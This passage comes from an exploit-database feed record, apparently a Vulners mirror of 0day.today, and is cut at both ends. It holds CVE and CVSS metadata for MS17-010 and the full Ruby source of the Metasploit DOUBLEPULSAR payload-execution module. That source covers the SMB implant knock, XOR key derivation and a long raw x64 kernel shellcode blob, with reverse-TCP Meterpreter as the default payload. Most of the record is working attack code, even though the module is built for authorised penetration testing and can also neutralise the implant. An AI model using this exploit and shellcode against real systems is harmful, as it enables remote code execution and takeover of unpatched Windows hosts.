\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-04] #"}, "lastseen": "2021-11-03T22:14:11", "differentElements": ["sourceData"], "edition": 65}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e9d1f56255a7764f4ebc7af5c0d726fe", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-11-04T22:17:15", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-04T22:17:15", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-04T22:17:15", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 
'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n 